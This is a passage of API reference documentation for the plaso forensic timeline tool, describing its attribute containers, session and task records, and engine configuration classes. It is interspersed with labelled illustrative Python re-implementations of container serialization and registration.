string identifying the parser that produced the event data.
Type str
query
query that was used to obtain the event data.
Type str
CONTAINER_TYPE = 'event_data'
GetAttributeValuesString()
Retrieves a comparable string of the attribute values.
Returns comparable string of the attribute values.
Return type str
Raises TypeError – if the attribute value type is not supported.
GetEventDataStreamIdentifier()
Retrieves the identifier of the associated event data stream.
The event data stream identifier is a storage specific value that should not be serialized.
Returns event data stream identifier or None when not set.
Return type AttributeContainerIdentifier
SetEventDataStreamIdentifier(event_data_stream_identifier)
Sets the identifier of the associated event data stream.
The event data stream identifier is a storage specific value that should not be serialized.
Parameters event_data_stream_identifier (AttributeContainerIdentifier) – event data stream identifier.
class plaso.containers.events.EventDataStream
Bases: plaso.containers.interface.AttributeContainer
Event data stream attribute container.
The event data stream attribute container represents the attributes of a data stream, such as the content of a file or extended attribute.
file_entropy
byte entropy value of the data stream.
Type str
md5_hash
MD5 digest hash of the data stream.
Type str
path_spec
path specification of the data stream.
Type dfvfs.PathSpec
sha1_hash
SHA-1 digest hash of the data stream.
Type str
sha256_hash
SHA-256 digest hash of the data stream.
Type str
yara_match
names of the Yara rules that matched the data stream.
Type list[str]
CONTAINER_TYPE = 'event_data_stream'
class plaso.containers.events.EventObject
Bases: plaso.containers.interface.AttributeContainer
Event attribute container.
The framework is designed to parse files and create events from individual records, log lines or keys extracted from files. The event object provides an extensible data store for event attributes.
date_time
date and time values.
Type dfdatetime.DateTimeValues
parser
string identifying the parser that produced the event.
Type str
timestamp
timestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
timestamp_desc
description of the meaning of the timestamp.
Type str
CONTAINER_TYPE = 'event'
GetEventDataIdentifier()
Retrieves the identifier of the associated event data.
The event data identifier is a storage specific value that should not be serialized.
Returns event data identifier or None when not set.
Return type AttributeContainerIdentifier
SetEventDataIdentifier(event_data_identifier)
Sets the identifier of the associated event data.
The event data identifier is a storage specific value that should not be serialized.
Parameters event_data_identifier (AttributeContainerIdentifier) – event data identifier.
__lt__(other)
Compares if the event attribute container is less than the other.
Events are compared by timestamp.
Parameters other (EventObject) – event attribute container to compare to.
Returns True if the event attribute container is less than the other.
Return type bool
class plaso.containers.events.EventTag
Bases: plaso.containers.interface.AttributeContainer
Event tag attribute container.
labels
labels, such as “malware”, “application_execution”.
Type list[str]
AddLabel(label)
Adds a label to the event tag.
Parameters label (str) – label.
Raises
• TypeError – if the label provided is not a string.
• ValueError – if a label is malformed.
AddLabels(labels)
Adds labels to the event tag.
Parameters labels (list[str]) – labels.
Raises ValueError – if a label is malformed.
CONTAINER_TYPE = 'event_tag'
classmethod CopyTextToLabel(text, prefix='')
Copies a string to a label.
A label only supports a limited set of characters, therefore unsupported characters are replaced with an underscore.
Parameters
• text (str) – label text.
• prefix (Optional[str]) – label prefix.
Returns label.
Return type str
CopyToDict()
Copies the event tag to a dictionary.
Returns event tag attributes.
Return type dict[str, object]
GetEventIdentifier()
Retrieves the identifier of the associated event.
The event identifier is a storage specific value that should not be serialized.
Returns event identifier or None when not set.
Return type AttributeContainerIdentifier
SetEventIdentifier(event_identifier)
Sets the identifier of the associated event.
The event identifier is a storage specific value that should not be serialized.
Parameters event_identifier (AttributeContainerIdentifier) – event identifier.
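The label rules the EventTag section describes, as an added illustration that is not plaso's own code: AddLabel rejects non-strings and malformed labels, and CopyTextToLabel turns free text such as a Yara rule name (the page's EventDataStream.yara_match) into a well-formed label. The permitted label alphabet, [A-Za-z0-9_], and the yara_ prefix are assumptions of this example.

```python
# Added illustrative re-implementation of EventTag label handling; not plaso's
# own code. The label alphabet below is an assumption of this example.
import re
from typing import Iterable, List

_VALID_LABEL = re.compile(r'^[A-Za-z0-9_]+$')
_INVALID_LABEL_CHARACTER = re.compile(r'[^A-Za-z0-9_]')


class EventTag:
    """Event tag holding the labels attached to one event."""

    CONTAINER_TYPE = 'event_tag'

    def __init__(self):
        self.labels: List[str] = []

    def AddLabel(self, label):
        """Adds a label; TypeError for non-strings, ValueError if malformed."""
        if not isinstance(label, str):
            raise TypeError('label is not a string: {0!r}'.format(label))
        if not _VALID_LABEL.match(label):
            raise ValueError('unsupported characters in label: {0:s}'.format(label))
        if label not in self.labels:   # keep labels unique per tag
            self.labels.append(label)

    def AddLabels(self, labels: Iterable[str]):
        """Adds several labels, validating each one in turn."""
        for label in labels:
            self.AddLabel(label)

    @classmethod
    def CopyTextToLabel(cls, text, prefix=''):
        """Maps arbitrary text onto the label alphabet, one underscore per
        unsupported character, so that rule or tool names become valid labels."""
        return _INVALID_LABEL_CHARACTER.sub('_', '{0:s}{1:s}'.format(prefix, text))

    def CopyToDict(self):
        return {'labels': list(self.labels)}


def TagFromYaraMatches(rule_names: Iterable[str]) -> EventTag:
    """Builds a tag from matched Yara rule names (constructed scenario: a tagging
    step that labels events whose data stream matched rules)."""
    tag = EventTag()
    tag.AddLabels(
        EventTag.CopyTextToLabel(name, prefix='yara_') for name in rule_names)
    return tag
```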
plaso.containers.interface module
The attribute container interface.
class plaso.containers.interface.AttributeContainer
Bases: object
The attribute container interface.
This is the base class for objects that exist primarily as a container of attributes with basic accessors and mutators.
The CONTAINER_TYPE class attribute contains a string that identifies the container type, for example the container type “event” identifies an event object.
Attributes are public class members of a serializable type. Protected and private class members are not to be serialized, with the exception of those defined in _SERIALIZABLE_PROTECTED_ATTRIBUTES.
CONTAINER_TYPE = None
CopyFromDict(attributes)
Copies the attribute container from a dictionary.
Parameters attributes (dict[str, object]) – attribute values per name.
CopyToDict()
Copies the attribute container to a dictionary.
Returns attribute values per name.
Return type dict[str, object]
GetAttributeNames()
Retrieves the names of all attributes.
Returns attribute names.
Return type list[str]
GetAttributeValuesHash()
Retrieves a hash of the comparable string of the attribute values.
Returns hash of comparable string of the attribute values.
Return type int
GetAttributeValuesString()
Retrieves a comparable string of the attribute values.
Returns comparable string of the attribute values.
Return type str
GetAttributes()
Retrieves the attribute names and values.
Attributes that are set to None are ignored.
Yields tuple[str, object] – attribute name and value.
GetIdentifier()
Retrieves the identifier.
The identifier is a storage specific value that should not be serialized.
Returns a unique identifier for the container.
Return type AttributeContainerIdentifier
GetSessionIdentifier()
Retrieves the session identifier.
The session identifier is a storage specific value that should not be serialized.
Returns session identifier.
Return type str
SetIdentifier(identifier)
Sets the identifier.
The identifier is a storage specific value that should not be serialized.
Parameters identifier (AttributeContainerIdentifier) – identifier.
SetSessionIdentifier(session_identifier)
Sets the session identifier.
The session identifier is a storage specific value that should not be serialized.
Parameters session_identifier (str) – session identifier.
class plaso.containers.interface.AttributeContainerIdentifier
Bases: object
The attribute container identifier.
The identifier is used to uniquely identify attribute containers. The value should be unique at runtime and in storage.
CopyToString()
Copies the identifier to a string representation.
Returns unique identifier or None.
Return type str
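The serialization rules the interface module lays down (public members are attributes, None values are skipped, protected members stay out unless allow-listed in _SERIALIZABLE_PROTECTED_ATTRIBUTES, identifiers are storage specific and never serialized), as an added illustration that is not plaso's own code. The EventDataStream subclass is modelled on the attributes listed above; its _row_identifier attribute and the use of SHA-256 for GetAttributeValuesHash are assumptions of this example.

```python
# Added illustrative re-implementation of the AttributeContainer interface;
# not plaso's own code.
import hashlib
from typing import Any, Dict, Iterator, List, Tuple


class AttributeContainer:
    """Base class for objects that exist primarily as containers of attributes.

    Public members are serializable attributes. Protected members (leading
    underscore) are not serialized unless listed in
    _SERIALIZABLE_PROTECTED_ATTRIBUTES; identifiers are storage specific and
    therefore never serialized."""

    CONTAINER_TYPE = None
    _SERIALIZABLE_PROTECTED_ATTRIBUTES: List[str] = []

    def __init__(self):
        self._identifier = None
        self._session_identifier = None

    def GetAttributeNames(self) -> List[str]:
        """Names of all serializable attributes, sorted for determinism."""
        return sorted(
            name for name in self.__dict__
            if not name.startswith('_') or
            name in self._SERIALIZABLE_PROTECTED_ATTRIBUTES)

    def GetAttributes(self) -> Iterator[Tuple[str, Any]]:
        """Yields (name, value) pairs; attributes set to None are ignored."""
        for name in self.GetAttributeNames():
            value = getattr(self, name)
            if value is not None:
                yield name, value

    def CopyToDict(self) -> Dict[str, Any]:
        return dict(self.GetAttributes())

    def CopyFromDict(self, attributes: Dict[str, Any]):
        """Restores attributes; names that would never have been serialized are
        rejected, so data read back from storage cannot set identifiers or
        other protected state."""
        for name, value in attributes.items():
            if (name.startswith('_') and
                    name not in self._SERIALIZABLE_PROTECTED_ATTRIBUTES):
                raise ValueError('Refusing to set protected attribute: {0:s}'.format(name))
            setattr(self, name, value)

    def GetAttributeValuesString(self) -> str:
        """Deterministic string, so equal containers compare equal."""
        return ', '.join(
            '{0:s}: {1!s}'.format(name, value) for name, value in self.GetAttributes())

    def GetAttributeValuesHash(self) -> int:
        # SHA-256 rather than built-in hash(): str hashing is salted per
        # process, so hash() would not be comparable across runs.
        digest = hashlib.sha256(self.GetAttributeValuesString().encode('utf-8')).digest()
        return int.from_bytes(digest[:8], 'big')

    def GetIdentifier(self):
        return self._identifier

    def SetIdentifier(self, identifier):
        self._identifier = identifier


class EventDataStream(AttributeContainer):
    """Hashes of a data stream, modelled on the EventDataStream attributes.
    _row_identifier is a constructed protected attribute that is allowed
    through serialization to show the allow-list in action."""

    CONTAINER_TYPE = 'event_data_stream'
    _SERIALIZABLE_PROTECTED_ATTRIBUTES = ['_row_identifier']

    def __init__(self):
        super().__init__()
        self._row_identifier = None
        self.file_entropy = None
        self.md5_hash = None
        self.sha1_hash = None
        self.sha256_hash = None
        self.yara_match = None
```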
plaso.containers.manager module
This file contains the attribute container manager class.
class plaso.containers.manager.AttributeContainersManager
Bases: object
Class that implements the attribute container manager.
classmethod CreateAttributeContainer(container_type)
Creates an instance of a specific attribute container type.
Parameters container_type (str) – container type.
Returns an instance of attribute container.
Return type AttributeContainer
Raises ValueError – if the container type is not supported.
classmethod DeregisterAttributeContainer(attribute_container_class)
Deregisters an attribute container class.
The attribute container classes are identified based on their lower case container type.
Parameters attribute_container_class (type) – attribute container class.
Raises KeyError – if attribute container class is not set for the corresponding container type.
classmethod RegisterAttributeContainer(attribute_container_class)
Registers an attribute container class.
The attribute container classes are identified based on their lower case container type.
Parameters attribute_container_class (type) – attribute container class.
Raises KeyError – if attribute container class is already set for the corresponding container type.
classmethod RegisterAttributeContainers(attribute_container_classes)
Registers attribute container classes.
The attribute container classes are identified based on their lower case container type.
Parameters attribute_container_classes (list[type]) – attribute container classes.
Raises KeyError – if attribute container class is already set for the corresponding container type.
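The registry behaviour documented for AttributeContainersManager (lower-case container type as key, KeyError on double registration or unknown deregistration, ValueError for an unsupported type), as an added illustration that is not plaso's own code. The two container classes are minimal stand-ins, and DeserializeContainer is a constructed helper showing how a storage reader would use the manager.

```python
# Added illustrative re-implementation of AttributeContainersManager; not
# plaso's own code. EventTag and ExtractionWarning are minimal stand-ins.
from typing import Dict, Type


class AttributeContainer:
    """Minimal stand-in for plaso.containers.interface.AttributeContainer."""
    CONTAINER_TYPE = None


class EventTag(AttributeContainer):
    CONTAINER_TYPE = 'event_tag'


class ExtractionWarning(AttributeContainer):
    CONTAINER_TYPE = 'extraction_warning'


class AttributeContainersManager:
    """Registry mapping lower-case container types to container classes."""

    _attribute_container_classes: Dict[str, Type[AttributeContainer]] = {}

    @classmethod
    def CreateAttributeContainer(cls, container_type):
        container_class = cls._attribute_container_classes.get(container_type.lower())
        if not container_class:
            raise ValueError('Unsupported container type: {0:s}'.format(container_type))
        return container_class()

    @classmethod
    def DeregisterAttributeContainer(cls, attribute_container_class):
        container_type = attribute_container_class.CONTAINER_TYPE.lower()
        if container_type not in cls._attribute_container_classes:
            raise KeyError('No attribute container class set for type: {0:s}'.format(
                container_type))
        del cls._attribute_container_classes[container_type]

    @classmethod
    def RegisterAttributeContainer(cls, attribute_container_class):
        container_type = attribute_container_class.CONTAINER_TYPE.lower()
        if container_type in cls._attribute_container_classes:
            raise KeyError('Attribute container class already set for type: {0:s}'.format(
                container_type))
        cls._attribute_container_classes[container_type] = attribute_container_class

    @classmethod
    def RegisterAttributeContainers(cls, attribute_container_classes):
        for attribute_container_class in attribute_container_classes:
            cls.RegisterAttributeContainer(attribute_container_class)


def DeserializeContainer(container_type, attributes):
    """Constructed helper: rebuilds a container from a stored type string and
    attribute dictionary, the way a storage reader would. An unknown type
    raises ValueError instead of silently yielding the wrong class, and
    protected names are refused because they are never serialized."""
    container = AttributeContainersManager.CreateAttributeContainer(container_type)
    for name, value in attributes.items():
        if name.startswith('_'):
            raise ValueError('Refusing to restore protected attribute: {0:s}'.format(name))
        setattr(container, name, value)
    return container


if __name__ == '__main__':
    AttributeContainersManager.RegisterAttributeContainers([EventTag, ExtractionWarning])
    warning = DeserializeContainer(
        'extraction_warning', {'message': 'unable to parse file', 'parser_chain': 'winreg'})
    print(type(warning).__name__, warning.message)
```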
plaso.containers.plist_event module
Plist event attribute containers.
class plaso.containers.plist_event.PlistTimeEventData
Bases: plaso.containers.events.EventData
Plist event data attribute container.
desc
description.
Type str
hostname
hostname.
Type str
key
name of plist key.
Type str
root
path from the root to this plist key.
Type str
username
unique username.
Type str
DATA_TYPE = 'plist:key'
plaso.containers.reports module
Report related attribute container definitions.
class plaso.containers.reports.AnalysisReport(plugin_name=None, text=None)
Bases: plaso.containers.interface.AttributeContainer
Analysis report attribute container.
filter_string
event filter expression.
Type str
plugin_name
name of the analysis plugin that generated the report.
Type str
report_array
???
Type array[str]
report_dict
???
Type dict[str]
text
report text.
Type str
time_compiled
timestamp of the date and time the report was compiled.
Type int
CONTAINER_TYPE = 'analysis_report'
CopyToDict()
Copies the attribute container to a dictionary.
Returns attribute values per name.
Return type dict[str, object]
GetString()
Retrieves a string representation of the report.
Returns string representation of the report.
Return type str
plaso.containers.sessions module
Session related attribute container definitions.
class plaso.containers.sessions.Session
Bases: plaso.containers.interface.AttributeContainer
Session attribute container.
aborted
True if the session was aborted.
Type bool
analysis_reports_counter
number of analysis reports per analysis plugin.
Type collections.Counter
artifact_filters
names of artifact definitions that are used for filtering file system and Windows Registry key paths.
Type list[str]
command_line_arguments
command line arguments.
Type str
completion_time
time that the session was completed. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
debug_mode
True if debug mode was enabled.
Type bool
enabled_parser_names
parser and parser plugin names that were enabled.
Type list[str]
event_labels_counter
number of event tags per label.
Type collections.Counter
filter_file
path to a file with find specifications.
Type str
identifier
unique identifier of the session.
Type str
parser_filter_expression
parser filter expression.
Type str
parsers_counter
number of events per parser or parser plugin.
Type collections.Counter
preferred_encoding
preferred encoding.
Type str
preferred_time_zone
preferred time zone.
Type str
preferred_year
preferred year.
Type int
product_name
name of the product that created the session, for example “log2timeline”.
Type str
product_version
version of the product that created the session.
Type str
source_configurations
configuration of sources that are (or going to be) processed.
Type list[SourceConfiguration]
start_time
time that the session was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
text_prepend
text to prepend to every display name.
Type str
CONTAINER_TYPE = 'session'
CopyAttributesFromSessionCompletion(session_completion)
Copies attributes from a session completion.
Parameters session_completion (SessionCompletion) – session completion attribute container.
Raises ValueError – if the identifier of the session completion does not match that of the session.
CopyAttributesFromSessionConfiguration(session_configuration)
Copies attributes from a session configuration.
Parameters session_configuration (SessionConfiguration) – session configuration attribute container.
Raises ValueError – if the identifier of the session configuration does not match that of the session.
CopyAttributesFromSessionStart(session_start)
Copies attributes from a session start.
Parameters session_start (SessionStart) – session start attribute container.
CreateSessionCompletion()
Creates a session completion.
Returns session completion attribute container.
Return type SessionCompletion
CreateSessionConfiguration()
Creates a session configuration.
Returns session configuration attribute container.
Return type SessionConfiguration
CreateSessionStart()
Creates a session start.
Returns session start attribute container.
Return type SessionStart
class plaso.containers.sessions.SessionCompletion(identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Session completion attribute container.
aborted
True if the session was aborted.
Type bool
analysis_reports_counter
number of analysis reports per analysis plugin.
Type collections.Counter
event_labels_counter
number of event tags per label.
Type collections.Counter
identifier
unique identifier of the session.
Type str
parsers_counter
number of events per parser or parser plugin.
Type collections.Counter
timestamp
time that the session was completed. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
CONTAINER_TYPE = 'session_completion'
class plaso.containers.sessions.SessionConfiguration(identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Session configuration attribute container.
The session configuration contains various settings used within a session, such as the parser and collection filters that are used, and information about the source being processed, such as the system configuration determined by pre-processing.
artifact_filters
names of artifact definitions that are used for filtering file system and Windows Registry key paths.
Type list[str]
command_line_arguments
command line arguments.
Type str
debug_mode
True if debug mode was enabled.
Type bool
enabled_parser_names
parser and parser plugin names that were enabled.
Type list[str]
filter_file
path to a file with find specifications.
Type str
identifier
unique identifier of the session.
Type str
parser_filter_expression
parser filter expression.
Type str
preferred_encoding
preferred encoding.
Type str
preferred_time_zone
preferred time zone.
Type str
preferred_year
preferred year.
Type int
source_configurations
configuration of sources that are (or going to be) processed.
Type list[SourceConfiguration]
text_prepend
text to prepend to every display name.
Type str
CONTAINER_TYPE = 'session_configuration'
class plaso.containers.sessions.SessionStart(identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Session start attribute container.
identifier
unique identifier of the session.
Type str
product_name
name of the product that created the session, for example “log2timeline”.
Type str
product_version
version of the product that created the session.
Type str
timestamp
time that the session was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
CONTAINER_TYPE = 'session_start'
plaso.containers.shell_item_events module
Shell item event attribute container.
class plaso.containers.shell_item_events.ShellItemFileEntryEventData
Bases: plaso.containers.events.EventData
Shell item file entry event data attribute container.
name
name of the file entry shell item.
Type str
long_name
long name of the file entry shell item.
Type str
localized_name
localized name of the file entry shell item.
Type str
file_reference
NTFS file reference, in the format: “MFT entry - sequence number”.
Type str
shell_item_path
shell item path.
Type str
origin
origin of the event.
Type str
DATA_TYPE = 'windows:shell_item:file_entry'
plaso.containers.storage_media module
Storage media related attribute container definitions.
class plaso.containers.storage_media.MountPoint(mount_path=None, path_specification=None)
Bases: plaso.containers.interface.AttributeContainer
Mount point attribute container.
mount_path
path where the path specification is mounted, such as “/mnt/image” or “C:”.
Type str
path_spec
path specification.
Type dfvfs.PathSpec
CONTAINER_TYPE = 'mount_point'
plaso.containers.tasks module
Task related attribute container definitions.
class plaso.containers.tasks.Task(session_identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Task attribute container.
A task describes a piece of work for a multi processing worker process, for example a task to process a path specification or to analyze an event.
aborted
True if the session was aborted.
Type bool
completion_time
time that the task was completed. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
file_entry_type
dfVFS type of the file entry the path specification is referencing.
Type str
has_retry
True if the task was previously abandoned and a retry task was created, False otherwise.
Type bool
identifier
unique identifier of the task.
Type str
last_processing_time
the last time the task was marked as being processed, as the number of milliseconds since January 1, 1970, 00:00:00 UTC.
Type int
merge_priority
priority used for the task storage file merge, where a lower value indicates a higher priority to merge.
Type int
path_spec
path specification.
Type dfvfs.PathSpec
session_identifier
the identifier of the session the task is part of.
Type str
start_time
time that the task was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
storage_file_size
size of the storage file in bytes.
Type int
storage_format
the format the task results are to be stored in.
Type str
CONTAINER_TYPE = 'task'
CreateRetryTask()
Creates a new task to retry a previously abandoned task.
The retry task will have a new identifier but most of the attributes will be a copy of the previously abandoned task.
Returns a task to retry a previously abandoned task.
Return type Task
CreateTaskCompletion()
Creates a task completion.
Returns task completion attribute container.
Return type TaskCompletion
CreateTaskStart()
Creates a task start.
Returns task start attribute container.
Return type TaskStart
UpdateProcessingTime()
Updates the processing time to now.
__lt__(other)
Compares if the task attribute container is less than the other.
Parameters other (Task) – task attribute container to compare to.
Returns True if the task attribute container is less than the other.
Return type bool
class plaso.containers.tasks.TaskCompletion(identifier=None, session_identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Task completion attribute container.
aborted
True if the session was aborted.
Type bool
identifier
unique identifier of the task.
Type str
session_identifier
the identifier of the session the task is part of.
Type str
timestamp
time that the task was completed. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
CONTAINER_TYPE = 'task_completion'
class plaso.containers.tasks.TaskStart(identifier=None, session_identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Task start attribute container.
identifier
unique identifier of the task.
Type str
session_identifier
the identifier of the session the task is part of.
Type str
timestamp
time that the task was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
CONTAINER_TYPE = 'task_start'
plaso.containers.time_events module
Time-based event attribute containers.
class plaso.containers.time_events.DateTimeValuesEvent(date_time, date_time_description, time_zone=None)
Bases: plaso.containers.events.EventObject
dfDateTime date time values-based event attribute container.
date_time
date and time values.
Type dfdatetime.DateTimeValues
timestamp
timestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
Type int
timestamp_desc
description of the meaning of the timestamp.
Type str
plaso.containers.warnings module
Warning attribute containers.
class plaso.containers.warnings.ExtractionError(message=None, parser_chain=None, path_spec=None)
Bases: plaso.containers.warnings.ExtractionWarning
Extraction error attribute container.
This class is provided for backwards compatibility only; all new code must use ExtractionWarning.
message
warning message.
Type str
parser_chain
parser chain to which the warning applies.
Type str
path_spec
path specification of the file entry to which the warning applies.
Type dfvfs.PathSpec
CONTAINER_TYPE = 'extraction_error'
class plaso.containers.warnings.ExtractionWarning(message=None, parser_chain=None, path_spec=None)
Bases: plaso.containers.interface.AttributeContainer
Extraction warning attribute container.
Extraction warnings are produced by parsers/plugins as well as the Plaso engine when they encounter situations that should be brought to the users’ attention but are not events derived from the data being processed.
message
warning message.
Type str
parser_chain
parser chain to which the warning applies.
Type str
path_spec
path specification of the file entry to which the warning applies.
Type dfvfs.PathSpec
CONTAINER_TYPE = 'extraction_warning'
plaso.containers.windows_events module
Windows event data attribute containers.
class plaso.containers.windows_events.WindowsDistributedLinkTrackingEventData(uuid, origin)
Bases: plaso.containers.events.EventData
Windows distributed link event data attribute container.
mac_address
MAC address stored in the UUID.
Type str
origin
origin of the event (event source), e.g. the path of the corresponding LNK file, or the file reference of the MFT entry with the corresponding NTFS $OBJECT_ID attribute.
Type str
uuid
UUID.
Type str
DATA_TYPE = 'windows:distributed_link_tracking:creation'
class plaso.containers.windows_events.WindowsRegistryEventData
Bases: plaso.containers.events.EventData
Windows Registry event data attribute container.
key_path
Windows Registry key path.
Type str
values
names and data of the values in the key.
Type str
DATA_TYPE = 'windows:registry:key_value'
class plaso.containers.windows_events.WindowsVolumeEventData
Bases: plaso.containers.events.EventData
Windows volume event data attribute container.
device_path
volume device path.
Type str
origin
origin of the event (event source), for example the corresponding Prefetch file name.
Type str
serial_number
volume serial number.
Type str
DATA_TYPE = 'windows:volume:creation'
Module contents
This file imports Python modules that register attribute container types.
5.1.5 plaso.engine package
Submodules
plaso.engine.artifact_filters module
Helper to create filters based on forensic artifact definitions.
class plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelper(artifacts_registry, knowledge_base)
Bases: plaso.engine.filters_helper.CollectionFiltersHelper
Helper to create collection filters based on artifact definitions.
Builds collection filters from forensic artifact definitions.
For more information about Forensic Artifacts see: https://github.com/ForensicArtifacts/artifacts/blob/master/docs/Artifacts%20definition%20format%20and%20style%20guide.asciidoc
file_system_artifact_names
names of artifact definitions that generated file system find specifications.
Type set[str]
registry_artifact_names
names of artifact definitions that generated Windows Registry find specifications.
Type set[str]
BuildFindSpecs(artifact_filter_names, environment_vari
ables=None)
Builds find specifications from artifact definitions.
Parameters
• artifact_filter_names (list[str]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths.
• environment_variables (Optional[list[EnvironmentVariableArtifact]]) – environment variables.
classmethod CheckKeyCompatibility(key_path)
Checks if a Windows Registry key path is supported by dfWinReg.
Parameters key_path (str) – path of the Windows Registry key.
Returns True if the key is compatible or False if not.
Return type bool
plaso.engine.configurations module
Processing configuration classes.
class plaso.engine.configurations.CredentialConfiguration(credential_data=None, credential_type=None, path_spec=None)
Bases: plaso.containers.interface.AttributeContainer
Configuration settings for a credential.
credential_data (bytes) – credential data.
credential_type (str) – credential type.
path_spec (dfvfs.PathSpec) – path specification.
CONTAINER_TYPE = 'credential_configuration'
class plaso.engine.configurations.EventExtractionConfiguration
Bases: plaso.containers.interface.AttributeContainer
Configuration settings for event extraction.
These settings are primarily used by the parser mediator.
filter_object (objectfilter.Filter) – filter that specifies which events to include.
CONTAINER_TYPE = 'event_extraction_configuration'
class plaso.engine.configurations.ExtractionConfiguration
Bases: plaso.containers.interface.AttributeContainer
Configuration settings for extraction.
These settings are primarily used by the extraction worker.
hasher_file_size_limit (int) – maximum file size that hashers should process, where 0 or None represents unlimited.
hasher_names_string (str) – comma separated string of names of hashers to use during processing.
process_archives (bool) – True if archive files should be scanned for file entries.
process_compressed_streams (bool) – True if file content in compressed streams should be processed.
yara_rules_string (str) – Yara rule definitions.
CONTAINER_TYPE = 'extraction_configuration'
class plaso.engine.configurations.ProcessingConfiguration
Bases: plaso.containers.interface.AttributeContainer
Configuration settings for processing.
artifact_filters (Optional[list[str]]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths.
credentials (list[CredentialConfiguration]) – credential configurations.
data_location (str) – path to the data files.
debug_output (bool) – True if debug output should be enabled.
event_extraction (EventExtractionConfiguration) – event extraction configuration.
extraction (ExtractionConfiguration) – extraction configuration.
filter_file (str) – path to a file with find specifications.
log_filename (str) – name of the log file.
parser_filter_expression (str) – parser filter expression, where None represents all parsers and plugins.
preferred_year (int) – preferred initial year value for year-less date and time values.
profiling (ProfilingConfiguration) – profiling configuration.
task_storage_format (str) – format to use for storing task results.
temporary_directory (str) – path of the directory for temporary files.
CONTAINER_TYPE = 'processing_configuration'
class plaso.engine.configurations.ProfilingConfiguration
Bases: plaso.containers.interface.AttributeContainer
Configuration settings for profiling.
directory (str) – path to the directory where the profiling sample files should be stored.
profilers (set[str]) – names of the profilers to enable. Supported profilers are:
• ‘memory’, which profiles memory usage;
• ‘parsers’, which profiles CPU time consumed by individual parsers;
• ‘processing’, which profiles CPU time consumed by different parts of processing;
• ‘serializers’, which profiles CPU time consumed by individual serializers;
• ‘storage’, which profiles storage reads and writes.
sample_rate (int) – the profiling sample rate. Contains the number of event sources processed.
CONTAINER_TYPE = 'profiling_configuration'
HaveProfileAnalyzers()
Determines if analyzers profiling is configured.
Returns True if analyzers profiling is configured.
Return type bool
HaveProfileMemory()
Determines if memory profiling is configured.
Returns True if memory profiling is configured.
Return type bool
HaveProfileParsers()
Determines if parsers profiling is configured.
Returns True if parsers profiling is configured.
Return type bool
HaveProfileProcessing()
Determines if processing profiling is configured.
Returns True if processing profiling is configured.
Return type bool
HaveProfileSerializers()
Determines if serializers profiling is configured.
Returns True if serializers profiling is configured.
Return type bool
HaveProfileStorage()
Determines if storage profiling is configured.
Returns True if storage profiling is configured.
Return type bool
HaveProfileTaskQueue()
Determines if task queue profiling is configured.
Returns True if task queue profiling is configured.
Return type bool
HaveProfileTasks()
Determines if tasks profiling is configured.
Returns True if tasks profiling is configured.
Return type bool
plaso.engine.engine module
The processing engine.
class plaso.engine.engine.BaseEngine
Bases: object
Processing engine interface.
collection_filters_helper (CollectionFiltersHelper) – collection filters helper.
knowledge_base (KnowledgeBase) – knowledge base.
classmethod BuildArtifactsRegistry(artifact_definitions_path, custom_artifacts_path)
Builds an artifact definitions registry from the artifact definitions files.
Parameters
• artifact_definitions_path (str) – path to artifact definitions file.
• custom_artifacts_path (str) – path to custom artifact definitions file.
Returns artifact definitions registry.
Return type artifacts.ArtifactDefinitionsRegistry
Raises BadConfigOption – if artifact definitions cannot be read.
BuildCollectionFilters(artifact_definitions_path, custom_artifacts_path, knowledge_base_object, artifact_filter_names=None, filter_file_path=None)
Builds collection filters from artifacts or filter file if available.
Parameters
• artifact_definitions_path (str) – path to artifact definitions file.
• custom_artifacts_path (str) – path to custom artifact definitions file.
• knowledge_base_object (KnowledgeBase) – knowledge base.
• artifact_filter_names (Optional[list[str]]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths.
• filter_file_path (Optional[str]) – path of filter file.
Raises InvalidFilter – if no valid file system find specifications are built.
classmethod CreateSession(artifact_filter_names=None, command_line_arguments=None, debug_mode=False, filter_file_path=None, preferred_encoding='utf-8', preferred_time_zone=None, preferred_year=None, text_prepend=None)
Creates a session attribute container.
Parameters
• artifact_filter_names (Optional[list[str]]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths.
• command_line_arguments (Optional[str]) – the command line arguments.
• debug_mode (bool) – True if debug mode was enabled.
• filter_file_path (Optional[str]) – path to a file with find specifications.
• preferred_encoding (Optional[str]) – preferred encoding.
• preferred_time_zone (Optional[str]) – preferred time zone.
• preferred_year (Optional[int]) – preferred year.
• text_prepend (Optional[str]) – text to prepend to every display name.
Returns session attribute container.
Return type Session
GetSourceFileSystem(source_path_spec, resolver_context=None)
Retrieves the file system of the source.
Parameters
• source_path_spec (dfvfs.PathSpec) – path specification of the source to process.
• resolver_context (dfvfs.Context) – resolver context.
Returns a tuple containing:
dfvfs.FileSystem: file system.
path.PathSpec: mount point path specification. The mount point path specification refers to either a directory or a volume on a storage media device or image. It is needed by the dfVFS file system searcher (FileSystemSearcher) to indicate the base location of the file system.
Return type tuple
Raises RuntimeError – if source file system path specification is not set.
PreprocessSources(artifacts_registry_object, source_path_specs, resolver_context=None)
Preprocesses the sources.
Parameters
• artifacts_registry_object (artifacts.ArtifactDefinitionsRegistry) – artifact definitions registry.
• source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process.
• resolver_context (Optional[dfvfs.Context]) – resolver context.
plaso.engine.extractors module
The extractor class definitions.
An extractor is a class used to extract information from “raw” data.
class plaso.engine.extractors.EventExtractor(parser_filter_expression=None)
Bases: object
Event extractor.
An event extractor extracts events from event sources.
